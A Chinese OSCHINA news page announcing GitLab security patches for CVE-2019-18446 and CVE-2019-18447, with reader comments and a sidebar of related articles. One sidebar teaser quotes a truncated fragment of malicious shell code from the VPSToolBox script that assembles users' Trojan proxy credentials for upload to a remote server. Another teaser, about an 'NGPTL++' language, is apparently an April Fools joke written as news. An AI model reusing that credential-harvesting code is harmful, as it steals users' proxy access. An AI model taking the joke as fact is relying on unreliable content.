投递新闻

GitLab 12.4.1, 12.3.6, 12.2.9 发布，不升级很危险！！！

来源: OSCHINA

编辑: 红薯

2019-10-31 22:21:00

本文被收录于专区

服务端

进入专区参与更多专题讨论

Gitlab 又又又发布了重要的安全更新补丁 12.4.1, 12.3.6, 和 12.2.9 ，包括社区版和企业版。包含重要的安全更新，强烈建议所有 Gitlab 用户立即更新！！！

存在的安全漏洞编号 CVE-2019-18446 ，影响 GitLab CE/EE 8.15 以及以后的所有版本！

该安全漏洞会导致未授权的用户删除合并请求分支。

此外还有 CVE-2019-18447 ，该漏洞会导致私有组的成员泄露，该漏洞影响之前的所有版本！！！

还有其他的漏洞（请看这里）例如私有项目名泄露等等，我就懒得一一赘述了，反正安全漏洞很多，你自己看着办。

------

如果嫌麻烦，不妨用 gitee.com ，安全又省事。

展开阅读全文

本站新闻禁止未经授权转载，违者依法追究相关法律责任。授权请联系：oscbianji#oschina.cn

本文标题：GitLab 12.4.1, 12.3.6, 12.2.9 发布，不升级很危险！！！

本文地址：https://www.oschina.net/news/110992/security-release-gitlab-12-dot-4-dot-1-released

精彩评论

JollyRoger

不用gitlab，可以用Gogs、Gitea嘛

2019-11-01 09:39

6 赞

跑来跑去

看出来了，小红薯喝着小酒，翘着二郎腿写的这篇报道。

2019-10-31 22:41

6 赞

醉叟策驴

最后一句说到了重点

2019-10-31 22:26

4 赞

这波天秀

无论哪个项目，都会有漏洞，区别就在于可以修复和不可以修复，就像某node，从一开始就有致命漏洞并且无法修复，反正要么是前端要么是玩具，有没有漏洞没什么影响

2019-11-01 12:46

1 赞

紫辰潇湘

gitlab 技术真的不行很没保障 bug 删数据什么都有

2019-11-01 09:07

1 赞

5 收藏

其他人还在看

更多精彩内容

Redis 错误导致 ChatGPT 数据泄露，技术细节一并公布

在上周一，ChatGPT 遭遇了一次用户数据泄漏事件，许多 ChatGPT 的用户都在自己的历史对话中看到了其他人的对话记录。不光是对话的历史记录，不少 ChatGPT Plus 用户还在 Reddit 和 Twitter 等平台发出了截图，表示在他们的订阅页面上看到了其他人的电子邮件地址。事件发生后，OpenAI 临时关闭了 ChatGPT 服务以调查问题...

新开源！跨时代 AI 编程语言 NGPTL++

3 月 31 日，当今世界最强科技狂人马斯克旗下的 NerveMind 公司基于 GPT-4 发布了一款名为 "NGPTL++" 的全新编程语言。根据文档介绍，这款编程语言具有革命性的特点，将彻底改变软件开发领域。 NGPTL 即 Next Generative Pre-trained Transformer Language，++ 则是致敬经典的 C++ 命名方式（inspired by gpt-4，并更上一...

Twitter 算法开源了！

当地时间 3 月 31 日，马斯克终于履行诺言正式宣布了 Twitter (推特) 算法的开源。该公司在 GitHub 上发布了两个存储库 (main repo、ml repo)，其中涵盖了推荐算法在内的许多推特源代码，包括用来控制用户在 For You 时间线上看到的推文的机制。并发布了一篇博客分享了有关推特算法的更多详细信息。 “今天标志着 Twitte...

Trojan 知名一键脚本 VPSToolBox 包含恶意代码

V2EX (https://v2ex.com/t/928400) 用户发现 Trojan 一键脚本 VPSToolBox 包含恶意代码，会将用户自建的 Trojan 节点链接上传至远程服务器。 clean_env(){ prasejson cd /root echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(g...